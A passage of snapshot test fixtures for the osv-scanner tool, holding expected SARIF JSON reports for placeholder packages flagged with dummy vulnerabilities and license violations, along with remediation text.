"\r\n", "\n" ], "policies": [], "redactionTokens": [], "results": [], "runAggregates": [], "taxonomies": [], "threadFlowLocations": [], "tool": { "driver": { "contents": [ "localizedData", "nonLocalizedData" ], "informationUri": "https://github.com/google/osv-scanner", "isComprehensive": false, "language": "en-US", "locations": [], "name": "osv-scanner", "notifications": [], "rules": [], "supportedTaxonomies": [], "taxa": [], 
"version": "2.3.4" }, "extensions": [] }, "translations": [], "versionControlProvenance": [], "webRequests": [], "webResponses": [] } ], "version": "2.1.0" } --- [TestPrintSARIFReport_WithLicenseViolations/one_source_with_one_package_and_one_license_violation_(dev) - 1] { "$schema": "https://raw.githubusercontent.com/oasis-tcs/sarif-spec/main/sarif-2.1/schema/sarif-schema-2.1.0.json", "properties": {}, "runs": [ { "addresses": [], "graphs": [], "invocations": [], "language": "en-US", "logicalLocations": [], "newlineSequences": [ "\r\n", "\n" ], "policies": [], "redactionTokens": [], "results": [], "runAggregates": [], "taxonomies": [], "threadFlowLocations": [], "tool": { "driver": { "contents": [ "localizedData", "nonLocalizedData" ], "informationUri": "https://github.com/google/osv-scanner", "isComprehensive": false, "language": "en-US", "locations": [], "name": "osv-scanner", "notifications": [], "rules": [], "supportedTaxonomies": [], "taxa": [], "version": "2.3.4" }, "extensions": [] }, "translations": [], "versionControlProvenance": [], "webRequests": [], "webResponses": [] } ], "version": "2.1.0" } --- [TestPrintSARIFReport_WithLicenseViolations/one_source_with_one_package_with_both_a_version_and_a_commit_and_one_license_violation - 1] { "$schema": "https://raw.githubusercontent.com/oasis-tcs/sarif-spec/main/sarif-2.1/schema/sarif-schema-2.1.0.json", "properties": {}, "runs": [ { "addresses": [], "graphs": [], "invocations": [], "language": "en-US", "logicalLocations": [], "newlineSequences": [ "\r\n", "\n" ], "policies": [], "redactionTokens": [], "results": [], "runAggregates": [], "taxonomies": [], "threadFlowLocations": [], "tool": { "driver": { "contents": [ "localizedData", "nonLocalizedData" ], "informationUri": "https://github.com/google/osv-scanner", "isComprehensive": false, "language": "en-US", "locations": [], "name": "osv-scanner", "notifications": [], "rules": [], "supportedTaxonomies": [], "taxa": [], "version": "2.3.4" }, "extensions": [] }, 
"translations": [], "versionControlProvenance": [], "webRequests": [], "webResponses": [] } ], "version": "2.1.0" } --- [TestPrintSARIFReport_WithLicenseViolations/one_source_with_one_package_with_just_a_commit_and_one_license_violation - 1] { "$schema": "https://raw.githubusercontent.com/oasis-tcs/sarif-spec/main/sarif-2.1/schema/sarif-schema-2.1.0.json", "properties": {}, "runs": [ { "addresses": [], "graphs": [], "invocations": [], "language": "en-US", "logicalLocations": [], "newlineSequences": [ "\r\n", "\n" ], "policies": [], "redactionTokens": [], "results": [], "runAggregates": [], "taxonomies": [], "threadFlowLocations": [], "tool": { "driver": { "contents": [ "localizedData", "nonLocalizedData" ], "informationUri": "https://github.com/google/osv-scanner", "isComprehensive": false, "language": "en-US", "locations": [], "name": "osv-scanner", "notifications": [], "rules": [], "supportedTaxonomies": [], "taxa": [], "version": "2.3.4" }, "extensions": [] }, "translations": [], "versionControlProvenance": [], "webRequests": [], "webResponses": [] } ], "version": "2.1.0" } --- [TestPrintSARIFReport_WithLicenseViolations/two_sources_with_packages,_one_license_violation - 1] { "$schema": "https://raw.githubusercontent.com/oasis-tcs/sarif-spec/main/sarif-2.1/schema/sarif-schema-2.1.0.json", "properties": {}, "runs": [ { "addresses": [], "graphs": [], "invocations": [], "language": "en-US", "logicalLocations": [], "newlineSequences": [ "\r\n", "\n" ], "policies": [], "redactionTokens": [], "results": [], "runAggregates": [], "taxonomies": [], "threadFlowLocations": [], "tool": { "driver": { "contents": [ "localizedData", "nonLocalizedData" ], "informationUri": "https://github.com/google/osv-scanner", "isComprehensive": false, "language": "en-US", "locations": [], "name": "osv-scanner", "notifications": [], "rules": [], "supportedTaxonomies": [], "taxa": [], "version": "2.3.4" }, "extensions": [] }, "translations": [], "versionControlProvenance": [], "webRequests": 
[], "webResponses": [] } ], "version": "2.1.0" } --- [TestPrintSARIFReport_WithMixedIssues/multiple_sources_with_a_mixed_count_of_packages,_some_called_vulnerabilities_and_license_violations - 1] { "$schema": "https://raw.githubusercontent.com/oasis-tcs/sarif-spec/main/sarif-2.1/schema/sarif-schema-2.1.0.json", "properties": {}, "runs": [ { "addresses": [], "artifacts": [ { "length": -1, "location": { "index": -1, "uri": "file:///path/to/my/first/lockfile" }, "parentIndex": -1, "roles": [] }, { "length": -1, "location": { "index": -1, "uri": "file:///path/to/my/third/lockfile" }, "parentIndex": -1, "roles": [] }, { "length": -1, "location": { "index": -1, "uri": "file:///path/to/my/second/lockfile" }, "parentIndex": -1, "roles": [] } ], "graphs": [], "invocations": [], "language": "en-US", "logicalLocations": [], "newlineSequences": [ "\r\n", "\n" ], "policies": [], "redactionTokens": [], "results": [ { "attachments": [], "codeFlows": [], "fixes": [], "graphTraversals": [], "graphs": [], "kind": "fail", "level": "warning", "locations": [ { "annotations": [], "id": -1, "logicalLocations": [], "physicalLocation": { "artifactLocation": { "index": -1, "uri": "file:///path/to/my/first/lockfile" } }, "relationships": [] } ], "message": { "arguments": [], "text": "Package 'mine1@1.2.3' is vulnerable to 'OSV-1'." }, "partialFingerprints": { "primaryLocationLineHash": "[line-hash]" }, "rank": -1, "relatedLocations": [], "ruleId": "OSV-1", "ruleIndex": 0, "stacks": [], "taxa": [] }, { "attachments": [], "codeFlows": [], "fixes": [], "graphTraversals": [], "graphs": [], "kind": "fail", "level": "warning", "locations": [ { "annotations": [], "id": -1, "logicalLocations": [], "physicalLocation": { "artifactLocation": { "index": -1, "uri": "file:///path/to/my/third/lockfile" } }, "relationships": [] } ], "message": { "arguments": [], "text": "Package 'mine1@1.2.3' is vulnerable to 'OSV-1'." 
}, "partialFingerprints": { "primaryLocationLineHash": "[line-hash]" }, "rank": -1, "relatedLocations": [], "ruleId": "OSV-1", "ruleIndex": 0, "stacks": [], "taxa": [] }, { "attachments": [], "codeFlows": [], "fixes": [], "graphTraversals": [], "graphs": [], "kind": "fail", "level": "warning", "locations": [ { "annotations": [], "id": -1, "logicalLocations": [], "physicalLocation": { "artifactLocation": { "index": -1, "uri": "file:///path/to/my/second/lockfile" } }, "relationships": [] } ], "message": { "arguments": [], "text": "Package 'mine2@3.2.5' is vulnerable to 'OSV-2'." }, "partialFingerprints": { "primaryLocationLineHash": "[line-hash]" }, "rank": -1, "relatedLocations": [], "ruleId": "OSV-2", "ruleIndex": 1, "stacks": [], "taxa": [] } ], "runAggregates": [], "taxonomies": [], "threadFlowLocations": [], "tool": { "driver": { "contents": [ "localizedData", "nonLocalizedData" ], "informationUri": "https://github.com/google/osv-scanner", "isComprehensive": false, "language": "en-US", "locations": [], "name": "osv-scanner", "notifications": [], "rules": [ { "deprecatedIds": [ "OSV-1" ], "fullDescription": { "markdown": "", "text": "" }, "help": { "markdown": "**Your dependency is vulnerable to [OSV-1](https://osv.dev/OSV-1)**.\n\n## [OSV-1](https://osv.dev/OSV-1)\n\n\u003cdetails\u003e\n\u003csummary\u003eDetails\u003c/summary\u003e\n\n\u003e \n\n\u003c/details\u003e\n\n---\n\n### Affected Packages\n\n| Source | Package Name | Package Version |\n| --- | --- | --- |\n| lockfile:/path/to/my/first/lockfile | mine1 | 1.2.3 |\n| unknown:/path/to/my/third/lockfile | mine1 | 1.2.3 |\n\n## Remediation\n\nIf you believe these vulnerabilities do not affect your code and wish to ignore them, add them to the ignore list in an\n`osv-scanner.toml` file located in the same directory as the lockfile containing the vulnerable dependency.\n\nSee the format and more options in our documentation here: https://google.github.io/osv-scanner/configuration/\n\nAdd or append these 
values to the following config files to ignore this vulnerability:\n\n`/path/to/my/first/osv-scanner.toml`\n\n```\n[[IgnoredVulns]]\nid = \"OSV-1\"\nreason = \"Your reason for ignoring this vulnerability\"\n```\n`/path/to/my/third/osv-scanner.toml`\n\n```\n[[IgnoredVulns]]\nid = \"OSV-1\"\nreason = \"Your reason for ignoring this vulnerability\"\n```\n", "text": "**Your dependency is vulnerable to [OSV-1](https://osv.dev/OSV-1)**.\n\n## [OSV-1](https://osv.dev/OSV-1)\n\n\u003cdetails\u003e\n\u003csummary\u003eDetails\u003c/summary\u003e\n\n\u003e \n\n\u003c/details\u003e\n\n---\n\n### Affected Packages\n\n| Source | Package Name | Package Version |\n| --- | --- | --- |\n| lockfile:/path/to/my/first/lockfile | mine1 | 1.2.3 |\n| unknown:/path/to/my/third/lockfile | mine1 | 1.2.3 |\n\n## Remediation\n\nIf you believe these vulnerabilities do not affect your code and wish to ignore them, add them to the ignore list in an\n`osv-scanner.toml` file located in the same directory as the lockfile containing the vulnerable dependency.\n\nSee the format and more options in our documentation here: https://google.github.io/osv-scanner/configuration/\n\nAdd or append these values to the following config files to ignore this vulnerability:\n\n`/path/to/my/first/osv-scanner.toml`\n\n```\n[[IgnoredVulns]]\nid = \"OSV-1\"\nreason = \"Your reason for ignoring this vulnerability\"\n```\n`/path/to/my/third/osv-scanner.toml`\n\n```\n[[IgnoredVulns]]\nid = \"OSV-1\"\nreason = \"Your reason for ignoring this vulnerability\"\n```\n" }, "id": "OSV-1", "name": "OSV-1", "relationships": [], "shortDescription": { "markdown": "OSV-1: Something scary!", "text": "OSV-1: Something scary!" 
} }, { "deprecatedIds": [ "OSV-2" ], "fullDescription": { "markdown": "", "text": "" }, "help": { "markdown": "**Your dependency is vulnerable to [OSV-2](https://osv.dev/OSV-2)**.\n\n## [OSV-2](https://osv.dev/OSV-2)\n\n\u003cdetails\u003e\n\u003csummary\u003eDetails\u003c/summary\u003e\n\n\u003e \n\n\u003c/details\u003e\n\n---\n\n### Affected Packages\n\n| Source | Package Name | Package Version |\n| --- | --- | --- |\n| sbom:/path/to/my/second/lockfile | mine2 | 3.2.5 |\n\n## Remediation\n\nIf you believe these vulnerabilities do not affect your code and wish to ignore them, add them to the ignore list in an\n`osv-scanner.toml` file located in the same directory as the lockfile containing the vulnerable dependency.\n\nSee the format and more options in our documentation here: https://google.github.io/osv-scanner/configuration/\n\nAdd or append these values to the following config files to ignore this vulnerability:\n\n`/path/to/my/second/osv-scanner.toml`\n\n```\n[[IgnoredVulns]]\nid = \"OSV-2\"\nreason = \"Your reason for ignoring this vulnerability\"\n```\n", "text": "**Your dependency is vulnerable to [OSV-2](https://osv.dev/OSV-2)**.\n\n## [OSV-2](https://osv.dev/OSV-2)\n\n\u003cdetails\u003e\n\u003csummary\u003eDetails\u003c/summary\u003e\n\n\u003e \n\n\u003c/details\u003e\n\n---\n\n### Affected Packages\n\n| Source | Package Name | Package Version |\n| --- | --- | --- |\n| sbom:/path/to/my/second/lockfile | mine2 | 3.2.5 |\n\n## Remediation\n\nIf you believe these vulnerabilities do not affect your code and wish to ignore them, add them to the ignore list in an\n`osv-scanner.toml` file located in the same directory as the lockfile containing the vulnerable dependency.\n\nSee the format and more options in our documentation here: https://google.github.io/osv-scanner/configuration/\n\nAdd or append these values to the following config files to ignore this vulnerability:\n\n`/path/to/my/second/osv-scanner.toml`\n\n```\n[[IgnoredVulns]]\nid = \"OSV-2\"\nreason 
= \"Your reason for ignoring this vulnerability\"\n```\n" }, "id": "OSV-2", "name": "OSV-2", "relationships": [], "shortDescription": { "markdown": "OSV-2: Something less scary!", "text": "OSV-2: Something less scary!" } } ], "supportedTaxonomies": [], "taxa": [], "version": "2.3.4" }, "extensions": [] }, "translations": [], "versionControlProvenance": [], "webRequests": [], "webResponses": [] } ], "version": "2.1.0" } --- [TestPrintSARIFReport_WithMixedIssues/multiple_sources_with_a_mixed_count_of_packages,_some_vulnerabilities_and_license_violations - 1] { "$schema": "https://raw.githubusercontent.com/oasis-tcs/sarif-spec/main/sarif-2.1/schema/sarif-schema-2.1.0.json", "properties": {}, "runs": [ { "addresses": [], "artifacts": [ { "length": -1, "location": { "index": -1, "uri": "file:///path/to/my/first/lockfile" }, "parentIndex": -1, "roles": [] }, { "length": -1, "location": { "index": -1, "uri": "file:///path/to/my/third/lockfile" }, "parentIndex": -1, "roles": [] }, { "length": -1, "location": { "index": -1, "uri": "file:///path/to/my/second/lockfile" }, "parentIndex": -1, "roles": [] } ], "graphs": [], "invocations": [], "language": "en-US", "logicalLocations": [], "newlineSequences": [ "\r\n", "\n" ], "policies": [], "redactionTokens": [], "results": [ { "attachments": [], "codeFlows": [], "fixes": [], "graphTraversals": [], "graphs": [], "kind": "fail", "level": "warning", "locations": [ { "annotations": [], "id": -1, "logicalLocations": [], "physicalLocation": { "artifactLocation": { "index": -1, "uri": "file:///path/to/my/first/lockfile" } }, "relationships": [] } ], "message": { "arguments": [], "text": "Package 'mine1@1.2.3' is vulnerable to 'OSV-1'." 
}, "partialFingerprints": { "primaryLocationLineHash": "[line-hash]" }, "rank": -1, "relatedLocations": [], "ruleId": "OSV-1", "ruleIndex": 0, "stacks": [], "taxa": [] }, { "attachments": [], "codeFlows": [], "fixes": [], "graphTraversals": [], "graphs": [], "kind": "fail", "level": "warning", "locations": [ { "annotations": [], "id": -1, "logicalLocations": [], "physicalLocation": { "artifactLocation": { "index": -1, "uri": "file:///path/to/my/third/lockfile" } }, "relationships": [] } ], "message": { "arguments": [], "text": "Package 'mine1@1.2.3' is vulnerable to 'OSV-1'." }, "partialFingerprints": { "primaryLocationLineHash": "[line-hash]" }, "rank": -1, "relatedLocations": [], "ruleId": "OSV-1", "ruleIndex": 0, "stacks": [], "taxa": [] }, { "attachments": [], "codeFlows": [], "fixes": [], "graphTraversals": [], "graphs": [], "kind": "fail", "level": "warning", "locations": [ { "annotations": [], "id": -1, "logicalLocations": [], "physicalLocation": { "artifactLocation": { "index": -1, "uri": "file:///path/to/my/second/lockfile" } }, "relationships": [] } ], "message": { "arguments": [], "text": "Package 'mine2@3.2.5' is vulnerable to 'OSV-2'." 
}, "partialFingerprints": { "primaryLocationLineHash": "[line-hash]" }, "rank": -1, "relatedLocations": [], "ruleId": "OSV-2", "ruleIndex": 1, "stacks": [], "taxa": [] } ], "runAggregates": [], "taxonomies": [], "threadFlowLocations": [], "tool": { "driver": { "contents": [ "localizedData", "nonLocalizedData" ], "informationUri": "https://github.com/google/osv-scanner", "isComprehensive": false, "language": "en-US", "locations": [], "name": "osv-scanner", "notifications": [], "rules": [ { "deprecatedIds": [ "OSV-1" ], "fullDescription": { "markdown": "", "text": "" }, "help": { "markdown": "**Your dependency is vulnerable to [OSV-1](https://osv.dev/OSV-1)**.\n\n## [OSV-1](https://osv.dev/OSV-1)\n\n\u003cdetails\u003e\n\u003csummary\u003eDetails\u003c/summary\u003e\n\n\u003e \n\n\u003c/details\u003e\n\n---\n\n### Affected Packages\n\n| Source | Package Name | Package Version |\n| --- | --- | --- |\n| lockfile:/path/to/my/first/lockfile | mine1 | 1.2.3 |\n| unknown:/path/to/my/third/lockfile | mine1 | 1.2.3 |\n\n## Remediation\n\nIf you believe these vulnerabilities do not affect your code and wish to ignore them, add them to the ignore list in an\n`osv-scanner.toml` file located in the same directory as the lockfile containing the vulnerable dependency.\n\nSee the format and more options in our documentation here: https://google.github.io/osv-scanner/configuration/\n\nAdd or append these values to the following config files to ignore this vulnerability:\n\n`/path/to/my/first/osv-scanner.toml`\n\n```\n[[IgnoredVulns]]\nid = \"OSV-1\"\nreason = \"Your reason for ignoring this vulnerability\"\n```\n`/path/to/my/third/osv-scanner.toml`\n\n```\n[[IgnoredVulns]]\nid = \"OSV-1\"\nreason = \"Your reason for ignoring this vulnerability\"\n```\n", "text": "**Your dependency is vulnerable to [OSV-1](https://osv.dev/OSV-1)**.\n\n## [OSV-1](https://osv.dev/OSV-1)\n\n\u003cdetails\u003e\n\u003csummary\u003eDetails\u003c/summary\u003e\n\n\u003e 
\n\n\u003c/details\u003e\n\n---\n\n### Affected Packages\n\n| Source | Package Name | Package Version |\n| --- | --- | --- |\n| lockfile:/path/to/my/first/lockfile | mine1 | 1.2.3 |\n| unknown:/path/to/my/third/lockfile | mine1 | 1.2.3 |\n\n## Remediation\n\nIf you believe these vulnerabilities do not affect your code and wish to ignore them, add them to the ignore list in an\n`osv-scanner.toml` file located in the same directory as the lockfile containing the vulnerable dependency.\n\nSee the format and more options in our documentation here: https://google.github.io/osv-scanner/configuration/\n\nAdd or append these values to the following config files to ignore this vulnerability:\n\n`/path/to/my/first/osv-scanner.toml`\n\n```\n[[IgnoredVulns]]\nid = \"OSV-1\"\nreason = \"Your reason for ignoring this vulnerability\"\n```\n`/path/to/my/third/osv-scanner.toml`\n\n```\n[[IgnoredVulns]]\nid = \"OSV-1\"\nreason = \"Your reason for ignoring this vulnerability\"\n```\n" }, "id": "OSV-1", "name": "OSV-1", "relationships": [], "shortDescription": { "markdown": "OSV-1: Something scary!", "text": "OSV-1: Something scary!" 
} }, { "deprecatedIds": [ "OSV-2" ], "fullDescription": { "markdown": "", "text": "" }, "help": { "markdown": "**Your dependency is vulnerable to [OSV-2](https://osv.dev/OSV-2)**.\n\n## [OSV-2](https://osv.dev/OSV-2)\n\n\u003cdetails\u003e\n\u003csummary\u003eDetails\u003c/summary\u003e\n\n\u003e \n\n\u003c/details\u003e\n\n---\n\n### Affected Packages\n\n| Source | Package Name | Package Version |\n| --- | --- | --- |\n| sbom:/path/to/my/second/lockfile | mine2 | 3.2.5 |\n\n## Remediation\n\nIf you believe these vulnerabilities do not affect your code and wish to ignore them, add them to the ignore list in an\n`osv-scanner.toml` file located in the same directory as the lockfile containing the vulnerable dependency.\n\nSee the format and more options in our documentation here: https://google.github.io/osv-scanner/configuration/\n\nAdd or append these values to the following config files to ignore this vulnerability:\n\n`/path/to/my/second/osv-scanner.toml`\n\n```\n[[IgnoredVulns]]\nid = \"OSV-2\"\nreason = \"Your reason for ignoring this vulnerability\"\n```\n", "text": "**Your dependency is vulnerable to [OSV-2](https://osv.dev/OSV-2)**.\n\n## [OSV-2](https://osv.dev/OSV-2)\n\n\u003cdetails\u003e\n\u003csummary\u003eDetails\u003c/summary\u003e\n\n\u003e \n\n\u003c/details\u003e\n\n---\n\n### Affected Packages\n\n| Source | Package Name | Package Version |\n| --- | --- | --- |\n| sbom:/path/to/my/second/lockfile | mine2 | 3.2.5 |\n\n## Remediation\n\nIf you believe these vulnerabilities do not affect your code and wish to ignore them, add them to the ignore list in an\n`osv-scanner.toml` file located in the same directory as the lockfile containing the vulnerable dependency.\n\nSee the format and more options in our documentation here: https://google.github.io/osv-scanner/configuration/\n\nAdd or append these values to the following config files to ignore this vulnerability:\n\n`/path/to/my/second/osv-scanner.toml`\n\n```\n[[IgnoredVulns]]\nid = \"OSV-2\"\nreason 
= \"Your reason for ignoring this vulnerability\"\n```\n" }, "id": "OSV-2", "name": "OSV-2", "relationships": [], "shortDescription": { "markdown": "OSV-2: Something less scary!", "text": "OSV-2: Something less scary!" } } ], "supportedTaxonomies": [], "taxa": [], "version": "2.3.4" }, "extensions": [] }, "translations": [], "versionControlProvenance": [], "webRequests": [], "webResponses": [] } ], "version": "2.1.0" } --- [TestPrintSARIFReport_WithMixedIssues/multiple_sources_with_a_mixed_count_of_packages_with_versions_and_commits,_some_vulnerabilities_and_license_violations - 1] { "$schema": "https://raw.githubusercontent.com/oasis-tcs/sarif-spec/main/sarif-2.1/schema/sarif-schema-2.1.0.json", "properties": {}, "runs": [ { "addresses": [], "artifacts": [ { "length": -1, "location": { "index": -1, "uri": "file:///path/to/my/first/lockfile" }, "parentIndex": -1, "roles": [] }, { "length": -1, "location": { "index": -1, "uri": "file:///path/to/my/third/lockfile" }, "parentIndex": -1, "roles": [] }, { "length": -1, "location": { "index": -1, "uri": "file:///path/to/my/second/lockfile" }, "parentIndex": -1, "roles": [] } ], "graphs": [], "invocations": [], "language": "en-US", "logicalLocations": [], "newlineSequences": [ "\r\n", "\n" ], "policies": [], "redactionTokens": [], "results": [ { "attachments": [], "codeFlows": [], "fixes": [], "graphTraversals": [], "graphs": [], "kind": "fail", "level": "warning", "locations": [ { "annotations": [], "id": -1, "logicalLocations": [], "physicalLocation": { "artifactLocation": { "index": -1, "uri": "file:///path/to/my/first/lockfile" } }, "relationships": [] } ], "message": { "arguments": [], "text": "Package 'mine1@abcxzy' is vulnerable to 'OSV-1'." 
}, "partialFingerprints": { "primaryLocationLineHash": "[line-hash]" }, "rank": -1, "relatedLocations": [], "ruleId": "OSV-1", "ruleIndex": 0, "stacks": [], "taxa": [] }, { "attachments": [], "codeFlows": [], "fixes": [], "graphTraversals": [], "graphs": [], "kind": "fail", "level": "warning", "locations": [ { "annotations": [], "id": -1, "logicalLocations": [], "physicalLocation": { "artifactLocation": { "index": -1, "uri": "file:///path/to/my/third/lockfile" } }, "relationships": [] } ], "message": { "arguments": [], "text": "Package 'mine1@1.2.3' is vulnerable to 'OSV-1'." }, "partialFingerprints": { "primaryLocationLineHash": "[line-hash]" }, "rank": -1, "relatedLocations": [], "ruleId": "OSV-1", "ruleIndex": 0, "stacks": [], "taxa": [] }, { "attachments": [], "codeFlows": [], "fixes": [], "graphTraversals": [], "graphs": [], "kind": "fail", "level": "warning", "locations": [ { "annotations": [], "id": -1, "logicalLocations": [], "physicalLocation": { "artifactLocation": { "index": -1, "uri": "file:///path/to/my/second/lockfile" } }, "relationships": [] } ], "message": { "arguments": [], "text": "Package 'mine2@abc123' is vulnerable to 'OSV-2'." 
}, "partialFingerprints": { "primaryLocationLineHash": "[line-hash]" }, "rank": -1, "relatedLocations": [], "ruleId": "OSV-2", "ruleIndex": 1, "stacks": [], "taxa": [] } ], "runAggregates": [], "taxonomies": [], "threadFlowLocations": [], "tool": { "driver": { "contents": [ "localizedData", "nonLocalizedData" ], "informationUri": "https://github.com/google/osv-scanner", "isComprehensive": false, "language": "en-US", "locations": [], "name": "osv-scanner", "notifications": [], "rules": [ { "deprecatedIds": [ "OSV-1" ], "fullDescription": { "markdown": "", "text": "" }, "help": { "markdown": "**Your dependency is vulnerable to [OSV-1](https://osv.dev/OSV-1)**.\n\n## [OSV-1](https://osv.dev/OSV-1)\n\n\u003cdetails\u003e\n\u003csummary\u003eDetails\u003c/summary\u003e\n\n\u003e \n\n\u003c/details\u003e\n\n---\n\n### Affected Packages\n\n| Source | Package Name | Package Version |\n| --- | --- | --- |\n| lockfile:/path/to/my/first/lockfile | mine1 | abcxzy |\n| unknown:/path/to/my/third/lockfile | mine1 | 1.2.3 |\n\n## Remediation\n\nIf you believe these vulnerabilities do not affect your code and wish to ignore them, add them to the ignore list in an\n`osv-scanner.toml` file located in the same directory as the lockfile containing the vulnerable dependency.\n\nSee the format and more options in our documentation here: https://google.github.io/osv-scanner/configuration/\n\nAdd or append these values to the following config files to ignore this vulnerability:\n\n`/path/to/my/first/osv-scanner.toml`\n\n```\n[[IgnoredVulns]]\nid = \"OSV-1\"\nreason = \"Your reason for ignoring this vulnerability\"\n```\n`/path/to/my/third/osv-scanner.toml`\n\n```\n[[IgnoredVulns]]\nid = \"OSV-1\"\nreason = \"Your reason for ignoring this vulnerability\"\n```\n", "text": "**Your dependency is vulnerable to [OSV-1](https://osv.dev/OSV-1)**.\n\n## [OSV-1](https://osv.dev/OSV-1)\n\n\u003cdetails\u003e\n\u003csummary\u003eDetails\u003c/summary\u003e\n\n\u003e 
\n\n\u003c/details\u003e\n\n---\n\n### Affected Packages\n\n| Source | Package Name | Package Version |\n| --- | --- | --- |\n| lockfile:/path/to/my/first/lockfile | mine1 | abcxzy |\n| unknown:/path/to/my/third/lockfile | mine1 | 1.2.3 |\n\n## Remediation\n\nIf you believe these vulnerabilities do not affect your code and wish to ignore them, add them to the ignore list in an\n`osv-scanner.toml` file located in the same directory as the lockfile containing the vulnerable dependency.\n\nSee the format and more options in our documentation here: https://google.github.io/osv-scanner/configuration/\n\nAdd or append these values to the following config files to ignore this vulnerability:\n\n`/path/to/my/first/osv-scanner.toml`\n\n```\n[[IgnoredVulns]]\nid = \"OSV-1\"\nreason = \"Your reason for ignoring this vulnerability\"\n```\n`/path/to/my/third/osv-scanner.toml`\n\n```\n[[IgnoredVulns]]\nid = \"OSV-1\"\nreason = \"Your reason for ignoring this vulnerability\"\n```\n" }, "id": "OSV-1", "name": "OSV-1", "relationships": [], "shortDescription": { "markdown": "OSV-1: Something scary!", "text": "OSV-1: Something scary!" 
} }, { "deprecatedIds": [ "OSV-2" ], "fullDescription": { "markdown": "", "text": "" }, "help": { "markdown": "**Your dependency is vulnerable to [OSV-2](https://osv.dev/OSV-2)**.\n\n## [OSV-2](https://osv.dev/OSV-2)\n\n\u003cdetails\u003e\n\u003csummary\u003eDetails\u003c/summary\u003e\n\n\u003e \n\n\u003c/details\u003e\n\n---\n\n### Affected Packages\n\n| Source | Package Name | Package Version |\n| --- | --- | --- |\n| sbom:/path/to/my/second/lockfile | mine2 | abc123 |\n\n## Remediation\n\nIf you believe these vulnerabilities do not affect your code and wish to ignore them, add them to the ignore list in an\n`osv-scanner.toml` file located in the same directory as the lockfile containing the vulnerable dependency.\n\nSee the format and more options in our documentation here: https://google.github.io/osv-scanner/configuration/\n\nAdd or append these values to the following config files to ignore this vulnerability:\n\n`/path/to/my/second/osv-scanner.toml`\n\n```\n[[IgnoredVulns]]\nid = \"OSV-2\"\nreason = \"Your reason for ignoring this vulnerability\"\n```\n", "text": "**Your dependency is vulnerable to [OSV-2](https://osv.dev/OSV-2)**.\n\n## [OSV-2](https://osv.dev/OSV-2)\n\n\u003cdetails\u003e\n\u003csummary\u003eDetails\u003c/summary\u003e\n\n\u003e \n\n\u003c/details\u003e\n\n---\n\n### Affected Packages\n\n| Source | Package Name | Package Version |\n| --- | --- | --- |\n| sbom:/path/to/my/second/lockfile | mine2 | abc123 |\n\n## Remediation\n\nIf you believe these vulnerabilities do not affect your code and wish to ignore them, add them to the ignore list in an\n`osv-scanner.toml` file located in the same directory as the lockfile containing the vulnerable dependency.\n\nSee the format and more options in our documentation here: https://google.github.io/osv-scanner/configuration/\n\nAdd or append these values to the following config files to ignore this vulnerability:\n\n`/path/to/my/second/osv-scanner.toml`\n\n```\n[[IgnoredVulns]]\nid = 
\"OSV-2\"\nreason = \"Your reason for ignoring this vulnerability\"\n```\n" }, "id": "OSV-2", "name": "OSV-2", "relationships": [], "shortDescription": { "markdown": "OSV-2: Something less scary!", "text": "OSV-2: Something less scary!" } } ], "supportedTaxonomies": [], "taxa": [], "version": "2.3.4" }, "extensions": [] }, "translations": [], "versionControlProvenance": [], "webRequests": [], "webResponses": [] } ], "version": "2.1.0" } --- [TestPrintSARIFReport_WithMixedIssues/one_source_in_working_directory_with_one_package,_one_vulnerability,_and_one_license_violation - 1] { "$schema": "https://raw.githubusercontent.com/oasis-tcs/sarif-spec/main/sarif-2.1/schema/sarif-schema-2.1.0.json", "properties": {}, "runs": [ { "addresses": [], "artifacts": [ { "length": -1, "location": { "index": -1, "uri": "file:///path/to/my/first/lockfile" }, "parentIndex": -1, "roles": [] } ], "graphs": [], "invocations": [], "language": "en-US", "logicalLocations": [], "newlineSequences": [ "\r\n", "\n" ], "policies": [], "redactionTokens": [], "results": [ { "attachments": [], "codeFlows": [], "fixes": [], "graphTraversals": [], "graphs": [], "kind": "fail", "level": "warning", "locations": [ { "annotations": [], "id": -1, "logicalLocations": [], "physicalLocation": { "artifactLocation": { "index": -1, "uri": "file:///path/to/my/first/lockfile" } }, "relationships": [] } ], "message": { "arguments": [], "text": "Package 'mine1@1.2.3' is vulnerable to 'OSV-1'." 
}, "partialFingerprints": { "primaryLocationLineHash": "[line-hash]" }, "rank": -1, "relatedLocations": [], "ruleId": "OSV-1", "ruleIndex": 0, "stacks": [], "taxa": [] } ], "runAggregates": [], "taxonomies": [], "threadFlowLocations": [], "tool": { "driver": { "contents": [ "localizedData", "nonLocalizedData" ], "informationUri": "https://github.com/google/osv-scanner", "isComprehensive": false, "language": "en-US", "locations": [], "name": "osv-scanner", "notifications": [], "rules": [ { "deprecatedIds": [ "OSV-1" ], "fullDescription": { "markdown": "", "text": "" }, "help": { "markdown": "**Your dependency is vulnerable to [OSV-1](https://osv.dev/OSV-1)**.\n\n## [OSV-1](https://osv.dev/OSV-1)\n\n\u003cdetails\u003e\n\u003csummary\u003eDetails\u003c/summary\u003e\n\n\u003e \n\n\u003c/details\u003e\n\n---\n\n### Affected Packages\n\n| Source | Package Name | Package Version |\n| --- | --- | --- |\n| lockfile:/path/to/my/first/lockfile | mine1 | 1.2.3 |\n\n## Remediation\n\nIf you believe these vulnerabilities do not affect your code and wish to ignore them, add them to the ignore list in an\n`osv-scanner.toml` file located in the same directory as the lockfile containing the vulnerable dependency.\n\nSee the format and more options in our documentation here: https://google.github.io/osv-scanner/configuration/\n\nAdd or append these values to the following config files to ignore this vulnerability:\n\n`/path/to/my/first/osv-scanner.toml`\n\n```\n[[IgnoredVulns]]\nid = \"OSV-1\"\nreason = \"Your reason for ignoring this vulnerability\"\n```\n", "text": "**Your dependency is vulnerable to [OSV-1](https://osv.dev/OSV-1)**.\n\n## [OSV-1](https://osv.dev/OSV-1)\n\n\u003cdetails\u003e\n\u003csummary\u003eDetails\u003c/summary\u003e\n\n\u003e \n\n\u003c/details\u003e\n\n---\n\n### Affected Packages\n\n| Source | Package Name | Package Version |\n| --- | --- | --- |\n| lockfile:/path/to/my/first/lockfile | mine1 | 1.2.3 |\n\n## Remediation\n\nIf you believe these 
